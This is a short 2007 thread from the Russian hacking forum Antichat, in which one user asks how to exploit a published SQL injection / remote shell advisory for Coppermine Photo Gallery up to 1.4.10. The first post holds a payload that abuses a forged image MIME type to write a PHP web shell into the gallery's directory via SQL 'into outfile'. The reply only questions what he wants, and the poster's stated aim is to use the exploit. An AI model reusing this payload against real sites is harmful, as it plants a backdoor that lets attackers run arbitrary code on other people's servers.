Форум АНТИЧАТ - Не знаю ПРО MiME

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Не знаю ПРО MiME (https://forum.antichat.xyz/showthread.php?t=39236)

fly	30.04.2007 17:28

Не знаю ПРО MiME

Как это сделать.Типа код добавить в файл расширением изображения! :confused: :confused: :confused:
мутим картинку, с левым MIME type в Web сервере (lighttpd):

"image/jpg'/**/into/**/outfile/**/'/home/www/gallery/albums/edit/pic.php'/**/fields/**/terminated/**/by/**/''/**/optionally/**/enclosed/**/by/**/'<?if($_POST[nst]){include($_POST[nst]);}die;?>",

SQLHACK

01.05.2007 15:15

бред какой-то
>>>Типа код добавить в файл расширением изображения!
так ты хочешь внутрь файла запихать ? там mime не прописывается.
или ты хочешь послать на серв картинку c mime который ты описал?
вопрос: а что это юзает инъекцию в lighttpd ?

поясни чё ты конкретно хочешь сделать ?

fly	01.05.2007 19:25

Короче челы с NST нашли баг в Coppermine Photo Gallery vX.X.X<=1.4.10 - SQL Injection / Remote Shell [link]http://nst.void.ru/?q=papers&cat_where=advisories&show=22[/link]
Я хочу узнать как это юзать.

Время: 19:46